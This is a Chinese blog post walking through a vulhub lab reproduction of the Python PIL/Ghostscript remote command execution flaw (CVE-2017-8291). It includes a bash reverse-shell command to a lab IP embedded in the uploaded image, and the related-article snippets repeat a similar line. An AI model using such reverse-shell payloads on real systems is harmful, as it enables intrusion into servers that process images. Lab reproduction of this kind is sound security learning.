Python-PIL-远程命令执行(GhostButt-)(CVE-2017-8291)

最新推荐文章于 2024-01-22 17:16:44 发布
最新推荐文章于 2024-01-22 17:16:44 发布
阅读量710 收藏
点赞数
分类专栏: vulhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127147615
版权

title: Python PIL 远程命令执行漏洞(GhostButt )(CVE-2017-8291)
tags:
- 漏洞复现
data: 2022-9-12
categories:
- python

漏洞描述

python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。

kali 环境配置

安装https协议、CA证书、dirmngr

apt-get update

apt-get install -y apt-transport-https ca-certificates

apt-get install dirmngr

添加GPG密钥并添加更新源

curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list

系统更新以及安装docker

apt-get update&&apt install docker-ce

启动docker服务器 和compose

service docker start || apt install docker-compose

下载安装vulhub

git clone https://github.com/vulhub/vulhub.git

漏洞复现

启动环境

docker-compose up -d

初始化完成后 访问 ip:端口号
在这里插入图片描述

在docker cve漏洞下有poc.png 上传,在目录下查看创建aaaaa文件

在这里插入图片描述

更改图片文件内容

bash –c "bash –i >& /dev/tcp/192.168.2.131/1234 0>&1"

在这里插入图片描述

nc监听,再次上传poc.png
在这里插入图片描述

没有名字的名字的名字的名字
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python PIL 远程命令执行漏洞GhostButt CVE-2017-8291
qq_54713392的博客
05-14 907
Python PIL 远程命令执行漏洞GhostButt CVE-2017-8291漏洞原理:Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞CVE-2017-8291)的影响,造成远程命令执行漏洞 攻击机:window 10 192.168.32.1 靶机:ubantu 16.04 192.168.32.142 (1)在ubantu中开启docker环境CVE-2017-8291 执行命令:docker-compose up
Python PIL 远程命令执行漏洞GhostButt
EC_Carrot的博客
07-21 331
漏洞简介 Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞CVE-2017-8291)的影响,造成远程命令执行漏洞漏洞复现 运行后,访问http://your-ip:8000/即可看到一个上传页面。正常功能是上传一个PNG文件,后端调用PIL加载图片,输出长宽。但我们可以将可执行命令EPS文件后缀改成PNG进行上传,因为后端是根据文件头来判断图片类型,所以无视后缀检查。 我们用poc.png来上传,即可执行touch /tmp/aa
Python PIL远程命令执行漏洞(GhostButt)
qq_41048303的博客
12-21 1076
1.原理 Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。 2.漏洞环境 docker-compose up -d 运行后,访问http://192.168.184.130
Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)
didiplus
08-03 2602
漏洞原理 Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞CVE-2017-8291)的影响,造成远程命令执行漏洞漏洞详情 漏洞简述 PIL内部根据图片头(Magic Bytes)判断图片类型,如果发现是一个eps文件(头为%!PS),则分发给PIL/EpsImagePlugin.py处理。 在这个模块中,PIL调用了系统的gs命令,也就是GhostScript来处理图片文件: command = ["gs",
PIL-CVE-2017-8291
qq_48703517的博客
05-06 1042
打开靶场 192.168.71.141:8000打开 讲poc.png上传 以 docker exec –it 7dd /bin/bash 进入容器在tmp下找到poc.png 反弹shell bash –c “bash –i >& /dev/tcp/192.168.71.131/8888 0>&1” Kali启动监听 成功 ...
python-PIL:用Python制作的简单但有用的图像缩放器
04-17
Python-PIL库,全称Python Imaging Library,是Python编程语言中的一个强大图像处理库,用于处理各种图像操作,包括打开、显示、保存、编辑和转换图像格式等。在这个项目中,我们利用PIL来实现一个简单的图像缩放器...
Python-EmailMyPC通过邮件远程监控你的电脑
08-12
Python-EmailMyPC通过邮件远程监控你的电脑】 在当今数字化时代,远程监控电脑系统的需求日益增长,无论是为了管理远程设备、确保家庭安全还是检查工作进度。Python编程语言以其易读性、灵活性和丰富的库资源成为...
python-pptx安装包及其依赖包
03-02
"Pillow"是Python Imaging Library (PIL) 的一个分支,支持各种图像处理功能,包括读取、写入和操作各种图像格式。在与PowerPoint相关的项目中,Pillow库可能会用来处理和插入图片到PPTX文件中,例如缩放、裁剪或...
Python-远程桌面监控服务端
08-10
Python 远程桌面监控服务端是一种技术实现,它允许用户通过网络从一台计算机(客户端)访问并控制另一台计算机(服务器端)。这种技术在IT管理、远程技术支持和分布式团队协作中非常常见。在这个"Python-远程桌面...
Python-使用pythonPIL库将一张照片切分为9张图
08-10
PILPython Imaging Library)是Python的一个重要图像处理库,提供了丰富的功能,包括读取、操作和保存多种图像文件格式。本教程将详细讲解如何使用PythonPIL库将一张照片切分为9张等大小的小图。 首先,确保你...
Python 简单的远程执行命令
weixin_30763397的博客
07-01 208
client端执行命令,server端返回命令结果 # server 端 import socket, subprocess sk = socket.socket() address=('127.0.0.1', 8000) sk.bind(address) sk.listen(3) print('waiting....') while 1: conn, addr = sk.accept...
python 代码审计-命令执行漏洞(自己编写的代码)
weixin_33904756的博客
09-10 402
python 代码审计-命令执行漏洞(自己编写的代码) 0x00 源代码 def execute(request): context ={} ip= request.POST.get("ip") username= request.POST.get("username") password= request.POST.get("password") idn...
RCE(远程命令、代码执行漏洞
weixin_42393944的博客
08-10 545
1.理解:可以直接让攻击者向后台服务器远程注入操作命令或者代码,从而控制后台系统 2.区别: 远程命令执行:直接调用操作系统命令 远程代码执行:靠执行代码调用操作系统命令 3.windows系统命令拼接 <1>"|":管道符,前面命令标准输出,后面命令标准输入 <2>"&": A&B,先运行A后运行B <3>"||": A||B ,运行A命令,若A失败则运行B命令 <4&gt...
入侵防御漏洞复现(四)
最新发布
szdx1043的博客
01-22 964
ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套实现了DNS协议的开源软件。ISC BIND 9.9.7-P1及之前版本和9.10.2-P2及之前版本的named中存在安全漏洞远程攻击者可借助TKEY查询利用该漏洞造成拒绝服务(REQUIRE断言失败和守护进程退出)。
vulhub漏洞复现55_python
weixin_44193247的博客
02-11 722
vulhub漏洞复现练习篇
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1050
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
修复Python任意命令执行漏洞
智库新闻文章内容管理系统博客
04-30 1240
前言今天遇到一个不好做白名单的Python命令执行漏洞修复的问题。由于是shell=True导致的任意命令执行,一开始大胆猜测将True改为False即可。经过测试确实是这样,但是参数需要放在list里,稍微有点麻烦。后来考虑,还可以做黑名单,过滤掉特殊字符,那就写fuzz脚本跑那些需要过滤的字符。最后觉得黑名单方式可能会被绕过,就看官方文档,发现了一个牛逼的修复方法,利用shlex.quote(...
ImageMagick被曝远程命令执行漏洞
weixin_33752045的博客
05-05 192
2019独角兽企业重金招聘Python工程师标准>>> ...
python 代码注入、命令执行函数和方法
黑面狐
04-08 4089
一.内置危险函数 exec execfile eval 二.标准库危险模块 os subprocess commands 三.危险第三方库 Template(user_input) : 模板注入(SSTI)所产生的代码执行 subprocess32 四.反序列化 marshal PyYAML pickle和cpickle shelve PIL unzip ...
命令执行漏洞和修复方案
热门推荐
pygain的博客
10-22 1万+
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因: 脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调用一些外部程序。 PHP可调用外部程序的常见函数:system,exec,shell_exec,passthru,popen,pro
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值